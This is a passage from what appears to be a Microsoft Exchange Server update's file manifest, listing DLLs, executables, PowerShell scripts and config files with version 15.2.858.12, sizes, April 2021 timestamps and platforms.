applicable| 509| 27-Apr-21| 13:26| Not applicable \nEext.8.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 509| 27-Apr-21| 13:26| Not applicable \nEext.8.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 509| 27-Apr-21| 13:26| Not applicable \nEext_policy.14.0.microsoft.exchange.data.transport.dll| 15.2.858.12| 12,680| 27-Apr-21| 13:28| x86 \nEext_policy.14.1.microsoft.exchange.data.transport.dll| 15.2.858.12| 12,688| 27-Apr-21| 13:28| x86 \nEext_policy.14.2.microsoft.exchange.data.transport.dll| 15.2.858.12| 12,664| 27-Apr-21| 13:26| x86 \nEext_policy.14.3.microsoft.exchange.data.transport.dll| 15.2.858.12| 12,664| 27-Apr-21| 13:29| x86 \nEext_policy.14.4.microsoft.exchange.data.transport.dll| 15.2.858.12| 12,664| 27-Apr-21| 13:29| x86 \nEext_policy.15.0.microsoft.exchange.data.transport.dll| 15.2.858.12| 12,664| 27-Apr-21| 13:29| x86 \nEext_policy.15.1.microsoft.exchange.data.transport.dll| 15.2.858.12| 12,664| 27-Apr-21| 13:29| x86 \nEext_policy.15.2.microsoft.exchange.data.transport.dll| 15.2.858.12| 12,664| 27-Apr-21| 13:28| x86 \nEext_policy.15.20.microsoft.exchange.data.transport.dll| 15.2.858.12| 13,192| 27-Apr-21| 13:28| x86 \nEext_policy.8.1.microsoft.exchange.data.transport.dll| 15.2.858.12| 12,664| 27-Apr-21| 13:29| x86 \nEext_policy.8.2.microsoft.exchange.data.transport.dll| 15.2.858.12| 12,664| 27-Apr-21| 13:29| x86 \nEext_policy.8.3.microsoft.exchange.data.transport.dll| 15.2.858.12| 12,664| 27-Apr-21| 13:29| x86 \nEnableinmemorytracing.ps1| Not applicable| 13,396| 27-Apr-21| 13:25| Not applicable \nEnable_antimalwarescanning.ps1| Not applicable| 17,595| 27-Apr-21| 13:26| Not applicable \nEnable_basicauthtooauthconverterhttpmodule.ps1| Not applicable| 18,612| 27-Apr-21| 13:25| Not applicable \nEnable_crossforestconnector.ps1| Not applicable| 18,610| 27-Apr-21| 13:25| Not applicable \nEnable_outlookcertificateauthentication.ps1| Not applicable| 22,948| 27-Apr-21| 13:25| Not applicable \nEnable_outsidein.ps1| Not applicable| 13,679| 27-Apr-21| 13:27| Not applicable \nEngineupdateserviceinterfaces.dll| 15.2.858.12| 17,800| 27-Apr-21| 13:25| x86 \nEscprint.dll| 15.2.858.12| 20,344| 27-Apr-21| 13:23| x64 \nEse.dll| 15.2.858.12| 3,741,064| 27-Apr-21| 13:23| x64 \nEseback2.dll| 15.2.858.12| 350,072| 27-Apr-21| 13:23| x64 \nEsebcli2.dll| 15.2.858.12| 318,344| 27-Apr-21| 13:25| x64 \nEseperf.dll| 15.2.858.12| 108,936| 27-Apr-21| 13:25| x64 \nEseutil.exe| 15.2.858.12| 425,344| 27-Apr-21| 13:29| x64 \nEsevss.dll| 15.2.858.12| 44,424| 27-Apr-21| 13:23| x64 \nEtweseproviderresources.dll| 15.2.858.12| 101,264| 27-Apr-21| 13:23| x64 \nEventperf.dll| 15.2.858.12| 59,792| 27-Apr-21| 13:25| x64 \nExchange.depthtwo.types.ps1xml| Not applicable| 40,105| 27-Apr-21| 13:29| Not applicable \nExchange.format.ps1xml| Not applicable| 649,670| 27-Apr-21| 13:29| Not applicable \nExchange.partial.types.ps1xml| Not applicable| 44,335| 27-Apr-21| 13:29| Not applicable \nExchange.ps1| Not applicable| 20,787| 27-Apr-21| 13:28| Not applicable \nExchange.support.format.ps1xml| Not applicable| 26,547| 27-Apr-21| 13:27| Not applicable \nExchange.types.ps1xml| Not applicable| 365,129| 27-Apr-21| 13:28| Not applicable \nExchangeudfcommon.dll| 15.2.858.12| 122,744| 27-Apr-21| 13:28| x86 \nExchangeudfs.dll| 15.2.858.12| 272,776| 27-Apr-21| 13:28| x86 \nExchmem.dll| 15.2.858.12| 86,392| 27-Apr-21| 13:23| x64 \nExchsetupmsg.dll| 15.2.858.12| 19,344| 27-Apr-21| 13:26| x64 \nExdbfailureitemapi.dll| Not applicable| 27,016| 27-Apr-21| 13:23| x64 \nExdbmsg.dll| 15.2.858.12| 230,800| 27-Apr-21| 13:28| x64 \nExeventperfplugin.dll| 15.2.858.12| 25,488| 27-Apr-21| 13:27| x64 \nExmime.dll| 15.2.858.12| 364,944| 27-Apr-21| 13:27| x64 \nExportedgeconfig.ps1| Not applicable| 27,415| 27-Apr-21| 13:25| Not applicable \nExport_mailpublicfoldersformigration.ps1| Not applicable| 18,570| 27-Apr-21| 13:25| Not applicable \nExport_modernpublicfolderstatistics.ps1| Not applicable| 29,238| 27-Apr-21| 13:24| Not applicable \nExport_outlookclassification.ps1| Not applicable| 14,374| 27-Apr-21| 13:26| Not applicable \nExport_publicfolderstatistics.ps1| Not applicable| 23,137| 27-Apr-21| 13:25| Not applicable \nExport_retentiontags.ps1| Not applicable| 17,068| 27-Apr-21| 13:25| Not applicable \nExppw.dll| 15.2.858.12| 83,344| 27-Apr-21| 13:23| x64 \nExprfdll.dll| 15.2.858.12| 26,512| 27-Apr-21| 13:25| x64 \nExrpc32.dll| 15.2.858.12| 2,029,448| 27-Apr-21| 13:23| x64 \nExrw.dll| 15.2.858.12| 28,040| 27-Apr-21| 13:23| x64 \nExsetdata.dll| 15.2.858.12| 2,779,024| 27-Apr-21| 13:24| x64 \nExsetup.exe| 15.2.858.12| 35,208| 27-Apr-21| 13:28| x86 \nExsetupui.exe| 15.2.858.12| 471,952| 27-Apr-21| 13:26| x86 \nExtrace.dll| 15.2.858.12| 245,128| 27-Apr-21| 13:23| x64 \nExt_microsoft.exchange.data.transport.dll| 15.2.858.12| 601,464| 27-Apr-21| 13:23| x86 \nExwatson.dll| 15.2.858.12| 44,920| 27-Apr-21| 13:23| x64 \nFastioext.dll| 15.2.858.12| 60,304| 27-Apr-21| 13:23| x64 \nFil06f84122c94c91a0458cad45c22cce20| Not applicable| 784,631| 27-Apr-21| 13:29| Not applicable \nFil143a7a5d4894478a85eefc89a6539fc8| Not applicable| 1,909,228| 27-Apr-21| 13:29| Not applicable \nFil19f527f284a0bb584915f9994f4885c3| Not applicable| 648,760| 27-Apr-21| 13:29| Not applicable \nFil1a9540363a531e7fb18ffe600cffc3ce| Not applicable| 358,405| 27-Apr-21| 13:29| Not applicable \nFil220d95210c8697448312eee6628c815c| Not applicable| 303,657| 27-Apr-21| 13:28| Not applicable \nFil2cf5a31e239a45fabea48687373b547c| Not applicable| 652,759| 27-Apr-21| 13:28| Not applicable \nFil397f0b1f1d7bd44d6e57e496decea2ec| Not applicable| 784,628| 27-Apr-21| 13:29| Not applicable \nFil3ab126057b34eee68c4fd4b127ff7aee| Not applicable| 784,604| 27-Apr-21| 13:29| Not applicable \nFil41bb2e5743e3bde4ecb1e07a76c5a7a8| Not applicable| 149,154| 27-Apr-21| 13:26| Not applicable \nFil51669bfbda26e56e3a43791df94c1e9c| Not applicable| 9,345| 27-Apr-21| 13:29| Not applicable \nFil558cb84302edfc96e553bcfce2b85286| Not applicable| 85,259| 27-Apr-21| 13:29| Not applicable \nFil55ce217251b77b97a46e914579fc4c64| Not applicable| 648,754| 27-Apr-21| 13:28| Not applicable \nFil5a9e78a51a18d05bc36b5e8b822d43a8| Not applicable| 1,596,145| 27-Apr-21| 13:23| Not applicable \nFil5c7d10e5f1f9ada1e877c9aa087182a9| Not applicable| 1,596,145| 27-Apr-21| 13:23| Not applicable \nFil6569a92c80a1e14949e4282ae2cc699c| Not applicable| 1,596,145| 27-Apr-21| 13:23| Not applicable \nFil6a01daba551306a1e55f0bf6894f4d9f| Not applicable| 648,730| 27-Apr-21| 13:28| Not applicable \nFil8863143ea7cd93a5f197c9fff13686bf| Not applicable| 648,760| 27-Apr-21| 13:29| Not applicable \nFil8a8c76f225c7205db1000e8864c10038| Not applicable| 1,596,145| 27-Apr-21| 13:23| Not applicable \nFil8cd999415d36ba78a3ac16a080c47458| Not applicable| 784,634| 27-Apr-21| 13:28| Not applicable \nFil97913e630ff02079ce9889505a517ec0| Not applicable| 1,596,145| 27-Apr-21| 13:23| Not applicable \nFilaa49badb2892075a28d58d06560f8da2| Not applicable| 785,658| 27-Apr-21| 13:28| Not applicable \nFilae28aeed23ccb4b9b80accc2d43175b5| Not applicable| 648,757| 27-Apr-21| 13:28| Not applicable \nFilb17f496f9d880a684b5c13f6b02d7203| Not applicable| 784,634| 27-Apr-21| 13:29| Not applicable \nFilb94ca32f2654692263a5be009c0fe4ca| Not applicable| 2,564,949| 27-Apr-21| 13:28| Not applicable \nFilbabdc4808eba0c4f18103f12ae955e5c| Not applicable| #########| 27-Apr-21| 13:27| Not applicable \nFilc92cf2bf29bed21bd5555163330a3d07| Not applicable| 652,777| 27-Apr-21| 13:29| Not applicable \nFilcc478d2a8346db20c4e2dc36f3400628| Not applicable| 784,634| 27-Apr-21| 13:28| Not applicable \nFild26cd6b13cfe2ec2a16703819da6d043| Not applicable| 1,596,145| 27-Apr-21| 13:23| Not applicable \nFilf2719f9dc8f7b74df78ad558ad3ee8a6| Not applicable| 785,640| 27-Apr-21| 13:29| Not applicable \nFilfa5378dc76359a55ef20cc34f8a23fee| Not applicable| 1,427,187| 27-Apr-21| 13:27| Not applicable \nFilteringconfigurationcommands.ps1| Not applicable| 18,263| 27-Apr-21| 13:26| Not applicable \nFilteringpowershell.dll| 15.2.858.12| 223,112| 27-Apr-21| 13:25| x86 \nFilteringpowershell.format.ps1xml| Not applicable| 29,648| 27-Apr-21| 13:25| Not applicable \nFiltermodule.dll| 15.2.858.12| 180,112| 27-Apr-21| 13:25| x64 \nFipexeuperfctrresource.dll| 15.2.858.12| 15,224| 27-Apr-21| 13:25| x64 \nFipexeventsresource.dll| 15.2.858.12| 44,944| 27-Apr-21| 13:27| x64 \nFipexperfctrresource.dll| 15.2.858.12| 32,648| 27-Apr-21| 13:25| x64 \nFirewallres.dll| 15.2.858.12| 72,592| 27-Apr-21| 13:25| x64 \nFms.exe| 15.2.858.12| 1,350,008| 27-Apr-21| 13:25| x64 \nForefrontactivedirectoryconnector.exe| 15.2.858.12| 110,992| 27-Apr-21| 13:29| x64 \nFpsdiag.exe| 15.2.858.12| 18,832| 27-Apr-21| 13:25| x86 \nFsccachedfilemanagedlocal.dll| 15.2.858.12| 822,136| 27-Apr-21| 13:25| x64 \nFscconfigsupport.dll| 15.2.858.12| 56,712| 27-Apr-21| 13:26| x86 \nFscconfigurationserver.exe| 15.2.858.12| 430,984| 27-Apr-21| 13:25| x64 \nFscconfigurationserverinterfaces.dll| 15.2.858.12| 15,760| 27-Apr-21| 13:26| x86 \nFsccrypto.dll| 15.2.858.12| 208,784| 27-Apr-21| 13:25| x64 \nFscipcinterfaceslocal.dll| 15.2.858.12| 28,560| 27-Apr-21| 13:25| x86 \nFscipclocal.dll| 15.2.858.12| 38,280| 27-Apr-21| 13:26| x86 \nFscsqmuploader.exe| 15.2.858.12| 453,520| 27-Apr-21| 13:25| x64 \nGetucpool.ps1| Not applicable| 19,799| 27-Apr-21| 13:25| Not applicable \nGetvalidengines.ps1| Not applicable| 13,270| 27-Apr-21| 13:23| Not applicable \nGet_antispamfilteringreport.ps1| Not applicable| 15,789| 27-Apr-21| 13:23| Not applicable \nGet_antispamsclhistogram.ps1| Not applicable| 14,635| 27-Apr-21| 13:23| Not applicable \nGet_antispamtopblockedsenderdomains.ps1| Not applicable| 15,707| 27-Apr-21| 13:23| Not applicable \nGet_antispamtopblockedsenderips.ps1| Not applicable| 14,751| 27-Apr-21| 13:23| Not applicable \nGet_antispamtopblockedsenders.ps1| Not applicable| 15,478| 27-Apr-21| 13:23| Not applicable \nGet_antispamtoprblproviders.ps1| Not applicable| 14,681| 27-Apr-21| 13:23| Not applicable \nGet_antispamtoprecipients.ps1| Not applicable| 14,806| 27-Apr-21| 13:23| Not applicable \nGet_dleligibilitylist.ps1| Not applicable| 42,348| 27-Apr-21| 13:25| Not applicable \nGet_exchangeetwtrace.ps1| Not applicable| 28,959| 27-Apr-21| 13:27| Not applicable \nGet_publicfoldermailboxsize.ps1| Not applicable| 15,038| 27-Apr-21| 13:25| Not applicable \nGet_storetrace.ps1| Not applicable| 51,863| 27-Apr-21| 13:23| Not applicable \nHuffman_xpress.dll| 15.2.858.12| 32,632| 27-Apr-21| 13:23| x64 \nImportedgeconfig.ps1| Not applicable| 77,272| 27-Apr-21| 13:25| Not applicable \nImport_mailpublicfoldersformigration.ps1| Not applicable| 29,488| 27-Apr-21| 13:25| Not applicable \nImport_retentiontags.ps1| Not applicable| 28,850| 27-Apr-21| 13:25| Not applicable \nInproxy.dll| 15.2.858.12| 85,904| 27-Apr-21| 13:29| x64 \nInstallwindowscomponent.ps1| Not applicable| 34,531| 27-Apr-21| 13:27| Not applicable \nInstall_antispamagents.ps1| Not applicable| 17,909| 27-Apr-21| 13:23| Not applicable \nInstall_odatavirtualdirectory.ps1| Not applicable| 17,963| 27-Apr-21| 13:27| Not applicable \nInterop.activeds.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.858.12| 107,400| 27-Apr-21| 13:23| Not applicable \nInterop.adsiis.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.858.12| 20,368| 27-Apr-21| 13:24| Not applicable \nInterop.certenroll.dll| 15.2.858.12| 142,736| 27-Apr-21| 13:23| x86 \nInterop.licenseinfointerface.dll| 15.2.858.12| 14,208| 27-Apr-21| 13:25| x86 \nInterop.netfw.dll| 15.2.858.12| 34,184| 27-Apr-21| 13:23| x86 \nInterop.plalibrary.dll| 15.2.858.12| 72,568| 27-Apr-21| 13:23| x86 \nInterop.stdole2.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.858.12| 27,024| 27-Apr-21| 13:23| Not applicable \nInterop.taskscheduler.dll| 15.2.858.12| 46,456| 27-Apr-21| 13:23| x86 \nInterop.wuapilib.dll| 15.2.858.12| 60,816| 27-Apr-21| 13:27| x86 \nInterop.xenroll.dll| 15.2.858.12| 39,800| 27-Apr-21| 13:23| x86 \nKerbauth.dll| 15.2.858.12| 62,864| 27-Apr-21| 13:23| x64 \nLicenseinfointerface.dll| 15.2.858.12| 643,472| 27-Apr-21| 13:25| x64 \nLpversioning.xml| Not applicable| 20,446| 27-Apr-21| 13:27| Not applicable \nMailboxdatabasereseedusingspares.ps1| Not applicable| 31,916| 27-Apr-21| 13:23| Not applicable \nManagedavailabilitycrimsonmsg.dll| 15.2.858.12| 138,616| 27-Apr-21| 13:24| x64 \nManagedstorediagnosticfunctions.ps1| Not applicable| 126,249| 27-Apr-21| 13:23| Not applicable \nManagescheduledtask.ps1| Not applicable| 36,372| 27-Apr-21| 13:23| Not applicable \nManage_metacachedatabase.ps1| Not applicable| 51,119| 27-Apr-21| 13:27| Not applicable \nMce.dll| 15.2.858.12| 1,693,072| 27-Apr-21| 13:23| x64 \nMeasure_storeusagestatistics.ps1| Not applicable| 29,499| 27-Apr-21| 13:23| Not applicable \nMerge_publicfoldermailbox.ps1| Not applicable| 22,635| 27-Apr-21| 13:25| Not applicable \nMicrosoft.database.isam.dll| 15.2.858.12| 127,880| 27-Apr-21| 13:28| x86 \nMicrosoft.dkm.proxy.dll| 15.2.858.12| 25,992| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.activemonitoring.activemonitoringvariantconfig.dll| 15.2.858.12| 68,472| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.activemonitoring.eventlog.dll| 15.2.858.12| 17,784| 27-Apr-21| 13:24| x64 \nMicrosoft.exchange.addressbook.service.dll| 15.2.858.12| 233,336| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.addressbook.service.eventlog.dll| 15.2.858.12| 15,736| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.airsync.airsyncmsg.dll| 15.2.858.12| 43,408| 27-Apr-21| 13:28| x64 \nMicrosoft.exchange.airsync.comon.dll| 15.2.858.12| 1,775,992| 27-Apr-21| 13:26| x86 \nMicrosoft.exchange.airsync.dll1| 15.2.858.12| 505,232| 27-Apr-21| 13:26| Not applicable \nMicrosoft.exchange.airsynchandler.dll| 15.2.858.12| 76,176| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.anchorservice.dll| 15.2.858.12| 135,568| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.antispam.eventlog.dll| 15.2.858.12| 23,440| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.antispamupdate.eventlog.dll| 15.2.858.12| 15,744| 27-Apr-21| 13:28| x64 \nMicrosoft.exchange.antispamupdatesvc.exe| 15.2.858.12| 27,000| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.approval.applications.dll| 15.2.858.12| 53,624| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.assistants.dll| 15.2.858.12| 925,048| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.assistants.eventlog.dll| 15.2.858.12| 25,992| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.assistants.interfaces.dll| 15.2.858.12| 43,384| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.audit.azureclient.dll| 15.2.858.12| 15,224| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.auditlogsearch.eventlog.dll| 15.2.858.12| 14,728| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.auditlogsearchservicelet.dll| 15.2.858.12| 70,536| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.dll| 15.2.858.12| 94,584| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.eventlog.dll| 15.2.858.12| 13,192| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.authadmin.eventlog.dll| 15.2.858.12| 15,760| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.authadminservicelet.dll| 15.2.858.12| 36,736| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.authservicehostservicelet.dll| 15.2.858.12| 15,752| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.autodiscover.configuration.dll| 15.2.858.12| 79,736| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.autodiscover.dll| 15.2.858.12| 396,152| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.autodiscover.eventlogs.dll| 15.2.858.12| 21,368| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.autodiscoverv2.dll| 15.2.858.12| 57,216| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.bandwidthmonitorservicelet.dll| 15.2.858.12| 14,736| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.batchservice.dll| 15.2.858.12| 35,704| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.cabutility.dll| 15.2.858.12| 276,360| 27-Apr-21| 13:28| x64 \nMicrosoft.exchange.certificatedeployment.eventlog.dll| 15.2.858.12| 16,264| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.certificatedeploymentservicelet.dll| 15.2.858.12| 26,000| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.certificatenotification.eventlog.dll| 15.2.858.12| 13,696| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.certificatenotificationservicelet.dll| 15.2.858.12| 23,432| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.clients.common.dll| 15.2.858.12| 377,728| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.clients.eventlogs.dll| 15.2.858.12| 83,832| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.clients.owa.dll| 15.2.858.12| 2,971,016| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.clients.owa2.server.dll| 15.2.858.12| 5,029,768| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.clients.owa2.servervariantconfiguration.dll| 15.2.858.12| 893,840| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.clients.security.dll| 15.2.858.12| 413,584| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.clients.strings.dll| 15.2.858.12| 924,552| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.cluster.bandwidthmonitor.dll| 15.2.858.12| 31,608| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.cluster.common.dll| 15.2.858.12| 52,096| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.cluster.common.extensions.dll| 15.2.858.12| 21,896| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.cluster.diskmonitor.dll| 15.2.858.12| 33,656| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.cluster.replay.dll| 15.2.858.12| 3,515,272| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.cluster.replicaseeder.dll| 15.2.858.12| 108,416| 27-Apr-21| 13:28| x64 \nMicrosoft.exchange.cluster.replicavsswriter.dll| 15.2.858.12| 288,632| 27-Apr-21| 13:27| x64 \nMicrosoft.exchange.cluster.shared.dll| 15.2.858.12| 625,544| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.common.agentconfig.transport.dll| 15.2.858.12| 86,392| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.common.componentconfig.transport.dll| 15.2.858.12| 1,830,288| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.common.directory.adagentservicevariantconfig.dll| 15.2.858.12| 31,632| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.common.directory.directoryvariantconfig.dll| 15.2.858.12| 466,320| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.common.directory.domtvariantconfig.dll| 15.2.858.12| 26,000| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.common.directory.ismemberofresolverconfig.dll| 15.2.858.12| 38,280| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.common.directory.tenantrelocationvariantconfig.dll| 15.2.858.12| 102,792| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.common.directory.topologyservicevariantconfig.dll| 15.2.858.12| 48,528| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.common.diskmanagement.dll| 15.2.858.12| 67,448| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.common.dll| 15.2.858.12| 172,936| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.common.encryption.variantconfig.dll| 15.2.858.12| 113,552| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.common.il.dll| 15.2.858.12| 13,712| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.common.inference.dll| 15.2.858.12| 130,448| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.common.optics.dll| 15.2.858.12| 63,880| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.common.processmanagermsg.dll| 15.2.858.12| 19,856| 27-Apr-21| 13:23| x64 \nMicrosoft.exchange.common.protocols.popimap.dll| 15.2.858.12| 15,248| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.common.search.dll| 15.2.858.12| 108,928| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.common.search.eventlog.dll| 15.2.858.12| 17,784| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.common.smtp.dll| 15.2.858.12| 51,592| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.common.suiteservices.suiteservicesvariantconfig.dll| 15.2.858.12| 36,752| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.common.transport.azure.dll| 15.2.858.12| 27,536| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.common.transport.monitoringconfig.dll| 15.2.858.12| 1,042,320| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.commonmsg.dll| 15.2.858.12| 29,072| 27-Apr-21| 13:24| x64 \nMicrosoft.exchange.compliance.auditlogpumper.messages.dll| 15.2.858.12| 13,176| 27-Apr-21| 13:28| x64 \nMicrosoft.exchange.compliance.auditservice.core.dll| 15.2.858.12| 181,136| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.compliance.auditservice.messages.dll| 15.2.858.12| 30,096| 27-Apr-21| 13:26| x64 \nMicrosoft.exchange.compliance.common.dll| 15.2.858.12| 22,408| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.compliance.crimsonevents.dll| 15.2.858.12| 85,880| 27-Apr-21| 13:24| x64 \nMicrosoft.exchange.compliance.dll| 15.2.858.12| 41,352| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.compliance.recordreview.dll| 15.2.858.12| 37,264| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.compliance.supervision.dll| 15.2.858.12| 50,568| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.compliance.taskcreator.dll| 15.2.858.12| 33,168| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.compliance.taskdistributioncommon.dll| 15.2.858.12| 1,100,152| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.compliance.taskdistributionfabric.dll| 15.2.858.12| 206,728| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.compliance.taskplugins.dll| 15.2.858.12| 210,816| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.compression.dll| 15.2.858.12| 17,296| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.configuration.certificateauth.dll| 15.2.858.12| 37,760| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.configuration.certificateauth.eventlog.dll| 15.2.858.12| 14,224| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.configuration.core.dll| 15.2.858.12| 145,808| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.configuration.core.eventlog.dll| 15.2.858.12| 14,224| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.configuration.delegatedauth.dll| 15.2.858.12| 53,112| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.configuration.delegatedauth.eventlog.dll| 15.2.858.12| 15,752| 27-Apr-21| 13:24| x64 \nMicrosoft.exchange.configuration.diagnosticsmodules.dll| 15.2.858.12| 23,432| 27-Apr-21| 13:26| x86 \nMicrosoft.exchange.configuration.diagnosticsmodules.eventlog.dll| 15.2.858.12| 13,176| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.configuration.failfast.dll| 15.2.858.12| 54,664| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.configuration.failfast.eventlog.dll| 15.2.858.12| 13,704| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.configuration.objectmodel.dll| 15.2.858.12| 1,846,136| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.configuration.objectmodel.eventlog.dll| 15.2.858.12| 30,096| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.configuration.redirectionmodule.dll| 15.2.858.12| 68,480| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.configuration.redirectionmodule.eventlog.dll| 15.2.858.12| 15,248| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.dll| 15.2.858.12| 21,384| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.eventlog.dll| 15.2.858.12| 13,200| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.connectiondatacollector.dll| 15.2.858.12| 25,992| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.connections.common.dll| 15.2.858.12| 169,864| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.connections.eas.dll| 15.2.858.12| 330,128| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.connections.imap.dll| 15.2.858.12| 173,968| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.connections.pop.dll| 15.2.858.12| 71,056| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.contentfilter.wrapper.exe| 15.2.858.12| 203,656| 27-Apr-21| 13:24| x64 \nMicrosoft.exchange.context.client.dll| 15.2.858.12| 27,024| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.context.configuration.dll| 15.2.858.12| 51,600| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.context.core.dll| 15.2.858.12| 51,064| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.context.datamodel.dll| 15.2.858.12| 46,984| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.core.strings.dll| 15.2.858.12| 1,093,496| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.core.timezone.dll| 15.2.858.12| 57,224| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.data.applicationlogic.deep.dll| 15.2.858.12| 326,536| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.data.applicationlogic.dll| 15.2.858.12| 3,356,536| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.data.applicationlogic.eventlog.dll| 15.2.858.12| 35,720| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.data.applicationlogic.monitoring.ifx.dll| 15.2.858.12| 17,808| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.data.connectors.dll| 15.2.858.12| 165,264| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.data.consumermailboxprovisioning.dll| 15.2.858.12| 619,384| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.data.directory.dll| 15.2.858.12| 7,791,496| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.data.directory.eventlog.dll| 15.2.858.12| 80,272| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.data.dll| 15.2.858.12| 1,790,344| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.data.groupmailboxaccesslayer.dll| 15.2.858.12| 1,626,488| 27-Apr-21| 13:26| x86 \nMicrosoft.exchange.data.ha.dll| 15.2.858.12| 375,176| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.data.imageanalysis.dll| 15.2.858.12| 105,344| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.data.mailboxfeatures.dll| 15.2.858.12| 15,736| 27-Apr-21| 13:24| x86 